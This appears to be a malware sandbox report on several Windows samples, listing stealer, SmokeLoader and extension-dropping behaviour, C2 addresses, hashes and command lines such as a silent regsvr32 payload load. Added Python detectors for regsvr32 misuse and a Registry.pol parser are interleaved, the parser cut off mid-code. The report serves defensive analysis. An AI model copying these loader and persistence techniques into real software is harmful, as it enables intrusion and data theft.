US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp

Files

memory/4200-5-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

memory/4200-6-0x0000000000A60000-0x0000000000A68000-memory.dmp

memory/4200-7-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

memory/4200-8-0x0000000074FB0000-0x0000000075760000-memory.dmp

memory/4200-9-0x0000000074FB0000-0x0000000075760000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 aaa.apiaaaeg.com udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/2152-0-0x0000000140000000-0x000000014060D000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network

Country Destination Domain Proto
US 76.95.39.48:8080 tcp
US 76.95.39.48:8080 tcp

Files

C:\Users\Admin\AppData\Local\Temp\MYQXM.k

MD5 942afe4b6c981193fda8ede7a57fd5bb
SHA1 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6
SHA256 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88
SHA512 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955

memory/2268-4-0x0000000001EF0000-0x00000000020BA000-memory.dmp

memory/2268-5-0x00000000029D0000-0x0000000002AFE000-memory.dmp

memory/2268-6-0x0000000002C30000-0x0000000002D59000-memory.dmp

memory/2268-8-0x00000000029D0000-0x0000000002AFE000-memory.dmp

memory/2268-7-0x0000000001EF0000-0x00000000020BA000-memory.dmp

memory/2268-9-0x0000000000240000-0x00000000002FD000-memory.dmp

memory/2268-10-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-11-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-13-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-15-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-16-0x0000000002D60000-0x0000000004C4F000-memory.dmp

memory/2268-17-0x0000000004C50000-0x0000000004CF2000-memory.dmp

memory/2268-18-0x0000000004D00000-0x0000000004D9C000-memory.dmp

memory/2268-20-0x0000000004D00000-0x0000000004D9C000-memory.dmp

memory/2268-21-0x0000000004D00000-0x0000000004D9C000-memory.dmp

memory/2268-22-0x0000000000090000-0x0000000000091000-memory.dmp

memory/2268-24-0x00000000000A0000-0x00000000000A4000-memory.dmp

memory/2268-33-0x0000000002C30000-0x0000000002D59000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2568 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
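In behavioral13 and behavioral14, setup331.exe drops MYQXM.k into the user's Temp directory, writes into a child regsvr32.exe (the three WriteProcessMemory rows above), and has that child load the file with "regsvr32.exe" -s MYQXM.k. Two details matter for detection: the module is passed as a relative name with a non-DLL extension, so it resolves against the working directory the parent handed to regsvr32; and the command line names System32 while the process image is SysWOW64\regsvr32.exe, which is WOW64 file-system redirection and tells you the parent is a 32-bit process. The following Python is an added example and not part of the sandbox report: it scores process-creation events for this kind of regsvr32 misuse. The first event is assembled from the PIDs, image and command line in behavioral14 (its working directory is assumed, since the report only shows where MYQXM.k was dropped); the second is a constructed benign event for comparison and is not from the report.

```python
import re
from pathlib import PureWindowsPath

# Extensions regsvr32 is normally asked to register.
EXPECTED_EXT = {".dll", ".ocx", ".ax", ".cpl"}
# Lower-case path fragments writable by a standard user.
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\users\public",
                 r"\windows\temp", r"\programdata")


def split_cmdline(cmdline):
    """Split a Windows command line into arguments, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def regsvr32_module(args):
    """The module argument of a regsvr32 argv (skips /s /u /n /i:<cmdline>)."""
    for a in args[1:]:
        if a[:1] in ("/", "-"):
            continue
        return a
    return None


def wow64_redirected(ev):
    """True when the command line names System32 but the image is SysWOW64: a 32-bit parent."""
    return ("syswow64" in ev["image"].lower()
            and "\\system32\\" in ev["cmdline"].lower())


def assess_regsvr32(ev):
    """Findings for one process-creation event; empty for non-regsvr32 or clean events."""
    if PureWindowsPath(ev["image"]).name.lower() != "regsvr32.exe":
        return []
    module = regsvr32_module(split_cmdline(ev["cmdline"]))
    if module is None:
        return ["regsvr32 started without a module argument"]
    path = PureWindowsPath(module)
    if not path.is_absolute():
        # A relative name resolves against the working directory inherited from the parent.
        path = PureWindowsPath(ev["cwd"]) / path
    findings = []
    if path.suffix.lower() not in EXPECTED_EXT:
        findings.append(f"module has a non-DLL extension {path.suffix or '(none)'}: {path}")
    if any(frag in str(path).lower() for frag in USER_WRITABLE):
        findings.append(f"module is in a user-writable location: {path}")
    if any(frag in ev["parent_image"].lower() for frag in USER_WRITABLE):
        findings.append(f"parent runs from a user-writable location: {ev['parent_image']}")
    return findings


# Event 1 is assembled from behavioral14 (PIDs 2568 -> 4644, image and command
# line as reported; cwd is assumed, the report only shows where MYQXM.k was dropped).
# Event 2 is a constructed benign comparison and is not from the report.
EVENTS = [
    {"pid": 4644, "parent_pid": 2568,
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'"C:\Windows\System32\regsvr32.exe" -s MYQXM.k',
     "cwd": r"C:\Users\Admin\AppData\Local\Temp",
     "parent_image": r"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"},
    {"pid": 1, "parent_pid": 2,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Example\example.dll"',
     "cwd": r"C:\Windows\System32",
     "parent_image": r"C:\Windows\System32\msiexec.exe"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        tag = " (32-bit parent, WOW64 redirected)" if wow64_redirected(ev) else ""
        print(f"pid {ev['pid']}{tag}:", assess_regsvr32(ev) or "clean")
```

The event fields map directly onto Sysmon event 1 (Image, CommandLine, CurrentDirectory, ParentImage); the WOW64 check is context rather than a finding on its own, since any 32-bit installer produces the same mismatch.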

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 76.95.39.48:8080 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 70.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\MYQXM.k

MD5 942afe4b6c981193fda8ede7a57fd5bb
SHA1 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6
SHA256 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88
SHA512 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955

memory/4644-5-0x0000000001FC0000-0x000000000218A000-memory.dmp

memory/4644-6-0x00000000027F0000-0x000000000291E000-memory.dmp

memory/4644-7-0x0000000002A50000-0x0000000002B79000-memory.dmp

memory/4644-8-0x0000000001FC0000-0x000000000218A000-memory.dmp

memory/4644-9-0x00000000027F0000-0x000000000291E000-memory.dmp

memory/4644-10-0x0000000002B80000-0x0000000002C3D000-memory.dmp

memory/4644-11-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-12-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-14-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-15-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-17-0x0000000004BE0000-0x0000000004C82000-memory.dmp

memory/4644-16-0x0000000002CF0000-0x0000000004BDF000-memory.dmp

memory/4644-18-0x0000000004C90000-0x0000000004D2C000-memory.dmp

memory/4644-20-0x0000000004C90000-0x0000000004D2C000-memory.dmp

memory/4644-21-0x0000000004C90000-0x0000000004D2C000-memory.dmp

memory/4644-22-0x00000000000E0000-0x00000000000E1000-memory.dmp

memory/4644-23-0x00000000000F0000-0x00000000000F4000-memory.dmp

memory/4644-30-0x0000000002A50000-0x0000000002B79000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

96s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1008 -ip 1008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 460

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/1008-1-0x0000000000650000-0x0000000000750000-memory.dmp

memory/1008-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1008-3-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1008-4-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1008-5-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2232 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2232 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2232 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2232 -s 1020

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 aaa.apiaaaeg.com udp

Files

memory/2232-0-0x0000000140000000-0x000000014060D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabDE60.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarDE82.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
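Besides the Chrome extension manifest and the Firefox .xpi and omni.ja writes, rznVBFO.exe and LkXFgLD.exe create and modify C:\Windows\system32\GroupPolicy\Machine\Registry.pol and gpt.ini. Registry.pol is the machine local-policy store that gpt.ini points at; writing it is a common way for an installer to push HKLM\Software\Policies values (a browser extension force-install list, disabled developer tools and similar) that are re-applied on every policy refresh even if the user removes the extension. The report does not show what was written, so the practical check is to parse the file. The following Python is an added example and not part of the sandbox report: a parser for the PReg format (a "PReg" magic, a version DWORD, then UTF-16LE records of the form [key;value;type;size;data]) plus a filter for browser policy keys. The sample entries are constructed: the extension ID reuses the one from the Chrome Extensions path above, while the update URL, the DeveloperToolsAvailability value and the third entry are placeholders and not data from the report.

```python
import struct

PREG_MAGIC = b"PReg"
PREG_VERSION = 1
REG_SZ, REG_DWORD = 1, 4
# Keys under HKLM\Software\Policies that govern browsers (lower-case prefixes).
BROWSER_POLICY_PREFIXES = (
    "software\\policies\\google\\chrome",
    "software\\policies\\microsoft\\edge",
    "software\\policies\\mozilla\\firefox",
)


def _w(text):
    """Registry.pol stores keys, names and the [ ; ] delimiters as UTF-16LE."""
    return text.encode("utf-16-le")


def build_registry_pol(entries):
    """Serialise (key, value_name, type, data) tuples into a Registry.pol blob.

    Only used here to construct sample input; on a host the file is
    C:\\Windows\\System32\\GroupPolicy\\Machine\\Registry.pol."""
    out = bytearray(PREG_MAGIC + struct.pack("<I", PREG_VERSION))
    for key, name, vtype, data in entries:
        blob = struct.pack("<I", data) if vtype == REG_DWORD else _w(data + "\0")
        out += _w("[") + _w(key + "\0") + _w(";") + _w(name + "\0") + _w(";")
        out += struct.pack("<I", vtype) + _w(";") + struct.pack("<I", len(blob)) + _w(";")
        out += blob + _w("]")
    return bytes(out)


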